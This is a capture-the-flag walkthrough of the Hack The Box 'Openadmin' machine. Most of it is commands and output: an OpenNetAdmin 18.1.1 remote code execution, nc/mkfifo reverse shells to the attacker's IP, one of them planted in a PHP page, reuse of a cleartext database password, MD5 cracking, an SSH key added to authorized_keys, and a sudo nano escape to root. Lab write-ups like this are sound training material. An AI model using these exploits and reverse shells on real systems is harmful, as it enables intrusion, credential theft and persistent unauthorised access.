Openadmin
Contents
Ports scan
u505@kali:~/HTB/Machines/Openadmin$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.171
Starting masscan 1.0.5 at 2020-05-04 19:41:06 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.171 Discovered open port 22/tcp on 10.10.10.171
u505@kali:~/HTB/Machines/Openadmin$ nmap -sC -sV 10.10.10.171 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 15:41 EDT Nmap scan report for openadmin.htb (10.10.10.171) Host is up (0.037s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA) | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA) |_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds-
Web server
Dirsearch
u505@kali:~/HTB/Machines/Openadmin$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -r 1 -e "html,txt,js,php" -f -u http://openadmin.htb
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: html, txt, js, php | HTTP method: get | Threads: 10 | Wordlist size: 22974 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-04_15-49-46.log
Target: http://openadmin.htb
[15:49:46] Starting: [15:49:46] 403 - 278B - /.html [15:49:46] 403 - 278B - /.php [15:49:56] 200 - 14KB - /artwork/ [15:50:26] 403 - 278B - /icons/ [15:50:27] 200 - 11KB - /index.html [15:50:40] 200 - 12KB - /music/ [15:51:00] 403 - 278B - /server-status/ [15:51:21] Starting: artwork/ [15:51:22] 403 - 278B - /artwork/.html [15:51:22] 403 - 278B - /artwork/.php [15:51:26] 200 - 11KB - /artwork/about.html [15:51:35] 200 - 11KB - /artwork/blog.html [15:51:42] 200 - 9KB - /artwork/contact.html [15:51:44] 200 - 3KB - /artwork/css/ [15:51:55] 200 - 1KB - /artwork/fonts/ [15:52:02] 200 - 6KB - /artwork/images/ [15:52:03] 200 - 14KB - /artwork/index.html [15:52:06] 200 - 5KB - /artwork/js/ [15:52:11] 200 - 931B - /artwork/main.html [15:52:29] 200 - 410B - /artwork/readme.txt [15:52:35] 200 - 11KB - /artwork/services.html [15:52:37] 200 - 17KB - /artwork/single.html [15:52:57] Starting: icons/ [15:52:57] 403 - 278B - /icons/.php [15:52:57] 403 - 278B - /icons/.html [15:54:05] 200 - 35KB - /icons/README.html [15:54:13] 403 - 278B - /icons/small/ [15:54:32] Starting: music/ [15:54:32] 403 - 278B - /music/.html [15:54:32] 403 - 278B - /music/.php [15:54:45] 200 - 7KB - /music/blog.html [15:54:48] 200 - 23KB - /music/category.html [15:54:53] 200 - 6KB - /music/contact.html [15:54:55] 200 - 2KB - /music/css/ [15:55:13] 200 - 3KB - /music/img/ [15:55:13] 200 - 12KB - /music/index.html [15:55:17] 200 - 3KB - /music/js/ [15:55:22] 200 - 931B - /music/main.html [15:55:34] 200 - 9KB - /music/playlist.html [15:56:07] Starting: server-status/
Task Completed
Sites
These sites doesn't provide useful information.
Openadmin
The Login link redirects to http://openadmin.htb/ona/
This application is Opennetadmin version 18.1.1.
Searchexploit shows us that this version is vulnerable.
u505@kali:~/HTB/Machines/Openadmin$ searchsploit opennetadmin
--------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------- ----------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metaspl | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution | exploits/php/webapps/47691.sh
--------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
There is a shell script to exploit the vulnerability
u505@kali:~/HTB/Machines/Openadmin$ searchsploit -m 47691
Exploit: OpenNetAdmin 18.1.1 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/47691
Path: /usr/share/exploitdb/exploits/php/webapps/47691.sh
File Type: ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Openadmin/47691.sh
But I used this python script.
u505@kali:~/HTB/Machines/Openadmin$ wget -q https://raw.githubusercontent.com/amriunix/ona-rce/master/ona-rce.py
u505@kali:~/HTB/Machines/Openadmin$ python3 ona-rce.py check http://openadmin.htb/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] The remote host is vulnerable!
u505@kali:~/HTB/Machines/Openadmin$ python3 ona-rce.py exploit http://openadmin.htb/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ whoami
www-data
The RCE works and opens a pseudo shell.
Enumeration
Reverse shell
The pseudo shell is not very comfortable, so we use it to open a reverse shell.
u505@kali:~/HTB/Machines/Openadmin$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
We raise the listener and send the reverse shell command.
u505@kali:~/HTB/Machines/Openadmin$ python3 ona-rce.py exploit http://openadmin.htb/ona/ [*] OpenNetAdmin 18.1.1 - Remote Code Execution [+] Connecting ! [+] Connected Successfully! sh$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.26 4444 >/tmp/f ^C[-] Warning: Error while connecting o the remote target
The listener opens the reverse shell
u505@kali:~/HTB/Machines/Openadmin$ rlwrap nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.171. Ncat: Connection from 10.10.10.171:55728. /bin/sh: 0: can't access tty; job control turned off $ python3 -c "import pty;pty.spawn('/bin/bash')" www-data@openadmin:/opt/ona/www$ stty raw -echo stty raw -echo
Upload enumeration tools
u505@kali:~/HTB/Machines/Openadmin$ mkdir www u505@kali:~/HTB/Machines/Openadmin$ cd www/ u505@kali:~/HTB/Machines/Openadmin/www$ cp /opt/utils/LinEnum/LinEnum.sh u505@kali:~/HTB/Machines/Openadmin/www$ cp /opt/utils/pspy/pspy64 ./ u505@kali:~/HTB/Machines/Openadmin/www$ cp /opt/utils/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh ./ u505@kali:~/HTB/Machines/Openadmin/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ... 10.10.10.171 - - [04/May/2020 16:55:44] "GET / HTTP/1.1" 200 - 10.10.10.171 - - [04/May/2020 16:55:44] code 404, message File not found 10.10.10.171 - - [04/May/2020 16:55:44] "GET /robots.txt HTTP/1.1" 404 - 10.10.10.171 - - [04/May/2020 16:55:44] "GET /LinEnum.sh HTTP/1.1" 200 - 10.10.10.171 - - [04/May/2020 16:55:45] "GET /linpeas.sh HTTP/1.1" 200 - 10.10.10.171 - - [04/May/2020 16:55:45] "GET /pspy64 HTTP/1.1" 200 -
We download the tools in /tmp/
www-data@openadmin:/tmp$ wget -q -r http://10.10.14.26/ www-data@openadmin:/tmp$ cd 10.10.14.26 www-data@openadmin:/tmp/10.10.14.26$ chmod +x *
The enumeration tools doesn't provide useful information.
Database config file
www-data@openadmin:/var/www/ona/local/config$ cat database_settings.inc.php <?php
$ona_contexts=array ( 'DEFAULT' => array ( 'databases' => array ( 0 => array ( 'db_type' => 'mysqli', 'db_host' => 'localhost', 'db_login' => 'ona_sys', 'db_passwd' => 'n1nj4W4rri0R!', 'db_database' => 'ona_default', 'db_debug' => false, ), ), 'description' => 'Default data context', 'context_color' => '#D3DBFF', ), );
www-data@openadmin:/var/www/ona/local/config$ mysql -p -u ona_sys ona_default Enter password: n1nj4W4rri0R!
Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 105 Server version: 5.7.28-0ubuntu0.18.04.4 (Ubuntu)
Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> select * from users; select * from users; +----+----------+----------------------------------+-------+---------------------+---------------------+ | id | username | password | level | ctime | atime | +----+----------+----------------------------------+-------+---------------------+---------------------+ | 1 | guest | 098f6bcd4621d373cade4e832627b4f6 | 0 | 2020-05-04 21:06:14 | 2020-05-04 21:06:14 | | 2 | admin | 21232f297a57a5a743894a0e4a801fc3 | 0 | 2007-10-30 03:00:17 | 2007-12-02 22:10:26 | +----+----------+----------------------------------+-------+---------------------+---------------------+ 2 rows in set (0.00 sec)
I cracked the 2 passwords, but they are useless.
u505@kali:~/HTB/Machines/Openadmin$ cat mysql.hash guest:098f6bcd4621d373cade4e832627b4f6 admin:21232f297a57a5a743894a0e4a801fc3
u505@kali:~/HTB/Machines/Openadmin$ hashcat -m 0 mysql.hash --username /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ... u505@kali:~/HTB/Machines/Openadmin$ hashcat -m 0 mysql.hash --username /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show guest:098f6bcd4621d373cade4e832627b4f6:test admin:21232f297a57a5a743894a0e4a801fc3:admin
Pivot to user jimmy
The password of the database is Jimmy's password.
www-data@openadmin:/tmp$ su - jimmy Password: n1nj4W4rri0R!
jimmy@openadmin:~$ id uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)
Internal web server
With the user www-data, I spotted the folder internal, but I didn't have access. Now with user Jimmy, I access the folder.
jimmy@openadmin:~$ cd /var/www
jimmy@openadmin:/var/www$ ls -ltr
total 8
lrwxrwxrwx 1 www-data www-data 12 Nov 21 16:07 ona -> /opt/ona/www
drwxr-xr-x 6 www-data www-data 4096 Nov 22 15:59 html
drwxrwx--- 2 jimmy internal 4096 May 4 21:39 internal
There are php files. The program main.php seems to extract Joanna ssh key.
jimmy@openadmin:~$ cd /var/www/internal
jimmy@openadmin:/var/www/internal$ ls -l
total 16
-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal 185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal 341 May 4 21:32 main.php
jimmy@openadmin:/var/www/internal$ cat main.php
cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
Check the configuration.
www-data@openadmin:/etc/apache2/sites-enabled$ cat internal.conf Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846> ServerName internal.openadmin.htb DocumentRoot /var/www/internal
<IfModule mpm_itk_module> AssignUserID joanna joanna </IfModule>
ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
Creation of a ssh tunnel with user Jimmy.
u505@kali:~$ ssh -L 52846:127.0.0.1:52846 jimmy@openadmin.htb jimmy@openadmin.htb's password: Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage
System information as of Mon May 4 21:24:05 UTC 2020
System load: 0.0 Processes: 134 Usage of /: 49.8% of 7.81GB Users logged in: 1 Memory usage: 30% IP address for ens160: 10.10.10.171 Swap usage: 0%
* Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch
41 packages can be updated. 12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon May 4 21:23:11 2020 from 10.10.14.26
When I try to access the main.php file, we are redirected to the login page.
jimmy@openadmin:/var/www/internal$ cat index.php
...
if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
$_SESSION['username'] = 'jimmy';
header("Location: /main.php");
} else {
$msg = 'Wrong username or password.';
}
}
I could try to crack the hash, but I can modify the source code, so I simply create a copy of the main.php file without user control.
jimmy@openadmin:/var/www/internal$ cp main.php main2.php
jimmy@openadmin:/var/www/internal$ cat main2.php
<?php session_start();
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
Now we see the main2 page.
The key is encrypted. Again I could try to decipher the password, but I control the source code and I know that the code is executed as Joanna, I open a reverse shell with Joanna.
jimmy@openadmin:/var/www/internal$ cp main2.php main3.php
jimmy@openadmin:/var/www/internal$ vi main3.php
jimmy@openadmin:/var/www/internal$ cat main3.php
<?php session_start();
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('rm /tmp/h;mkfifo /tmp/h;cat /tmp/h|/bin/sh -i 2>&1|nc 10.10.14.26 4446 >/tmp/h');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
I start the listener.
u505@kali:~/HTB/Machines/Openadmin$ rlwrap nc -lvnp 4446 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4446 Ncat: Listening on 0.0.0.0:4446
u505@kali:~/HTB/Machines/Openadmin$ rlwrap nc -lvnp 4446 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4446 Ncat: Listening on 0.0.0.0:4446 Ncat: Connection from 10.10.10.171. Ncat: Connection from 10.10.10.171:34932. /bin/sh: 0: can't access tty; job control turned off $ python3 -c "import pty;pty.spawn('/bin/bash')" joanna@openadmin:/var/www/internal$ stty raw -echo stty raw -echo joanna@openadmin:/var/www/internal$ id uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)
User Flag
joanna@openadmin:/var/www/internal$ cd /home/joanna joanna@openadmin:/home/joanna$ cat user.txt <USER_FLAG>
Escalation of privileges
To access with a proper shell, I generate our ssh keys and add the public one to Joanna's profile.
u505@kali:~/HTB/Machines/Openadmin$ ssh-keygen -h Generating public/private rsa key pair. Enter file in which to save the key (/home/u505/.ssh/id_rsa): u505 Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in u505 Your public key has been saved in u505.pub The key fingerprint is: SHA256:0WXHoJ9bCk8kZLvDMgDbiCcNRna7zxrUuMaSFzBYNLg u505@kali The key's randomart image is: +---[RSA 3072]----+ | +O o o +o. | |.= * * + = .. | |..= * o . = . | |E = + . o = . | | = . S = + . | | + = o = + | | o * o + | | + o | | . | +----[SHA256]-----+
The public key.
u505@kali:~/HTB/Machines/Openadmin$ cat u505.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDtYXWJ/KAPrWE6mfdeNe6PE/wluXs7eqkIoEXYGpaeEPNTwt3y8BEJKegJMfdsj+noj5+lrNzQBgxEt2A5lcCWbaGVsFaPaj50QCQcN82hnj2Efj8ECm4YMJZpWREBCrzLTLbXHmqmv4kTTO7cF5f5RBh4rZVKtz22q8m9h0nXVWtEFOLotVPyfXZVKGJZ490o8B1VzrADKYE4Skali1bTMYbQ2cIPmRR7WGeib9JxFvV4FCdjZo1nxCKgxoO6ci1oQTHT877ye5G1Cvy5uu+vTOzK3OEBPT3ITdzvp31GmF62GEX3XmMMw2erGE1J6zDKKRJgw5OyZ9CNIcgdf9qruyA3nG0rc/xMoLDYtfdl09NcfMSMhlRmZLfcz+aMlD5/npVKIHC0f5T7XxXtdHNisfzPMuerY29AgwNqEL7MREcAOirYa/q+xuU3LJ1ZAFMEqq2yGz9DPPDhdN9fv4Ft+hfWVyMti9K3G0IMCKSTCtLKsTDcc74fKwHmwv2JmLc= u505@kali
We add the public key to Joanna's authorized_keys
joanna@openadmin:/home/joanna/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDtYXWJ/KAPrWE6mfdeNe6PE/wluXs7eqkIoEXYGpaeEPNTwt3y8BEJKegJMfdsj+noj5+lrNzQBgxEt2A5lcCWbaGVsFaPaj50QCQcN82hnj2Efj8ECm4YMJZpWREBCrzLTLbXHmqmv4kTTO7cF5f5RBh4rZVKtz22q8m9h0nXVWtEFOLotVPyfXZVKGJZ490o8B1VzrADKYE4Skali1bTMYbQ2cIPmRR7WGeib9JxFvV4FCdjZo1nxCKgxoO6ci1oQTHT877ye5G1Cvy5uu+vTOzK3OEBPT3ITdzvp31GmF62GEX3XmMMw2erGE1J6zDKKRJgw5OyZ9CNIcgdf9qruyA3nG0rc/xMoLDYtfdl09NcfMSMhlRmZLfcz+aMlD5/npVKIHC0f5T7XxXtdHNisfzPMuerY29AgwNqEL7MREcAOirYa/q+xuU3LJ1ZAFMEqq2yGz9DPPDhdN9fv4Ft+hfWVyMti9K3G0IMCKSTCtLKsTDcc74fKwHmwv2JmLc= u505@kali" >>authorized_keys
Now, I login as Joanna.
u505@kali:~/HTB/Machines/Openadmin$ ssh -i u505 joanna@openadmin.htb Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage
System information as of Mon May 4 22:32:34 UTC 2020
System load: 0.0 Processes: 142 Usage of /: 50.2% of 7.81GB Users logged in: 1 Memory usage: 30% IP address for ens160: 10.10.10.171 Swap usage: 0%
* Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch
41 packages can be updated. 12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Jan 2 21:12:40 2020 from 10.10.14.3 joanna@openadmin:~$ id uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)
Joanna can execute nano with privileged rights.
joanna@openadmin:~$ sudo -l Matching Defaults entries for joanna on openadmin: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin: (ALL) NOPASSWD: /bin/nano /opt/priv
Root Flag
joanna@openadmin:~$ sudo /bin/nano /opt/priv
CTRL R CTRL X Command to execute: reset; sh 1>&0 2>&0 #clear # bash root@openadmin:~# cd /root root@openadmin:/root# cat root.txt <ROOT_FLAG>
References
Daniel Simao 19:01, 4 May 2020 (EDT)
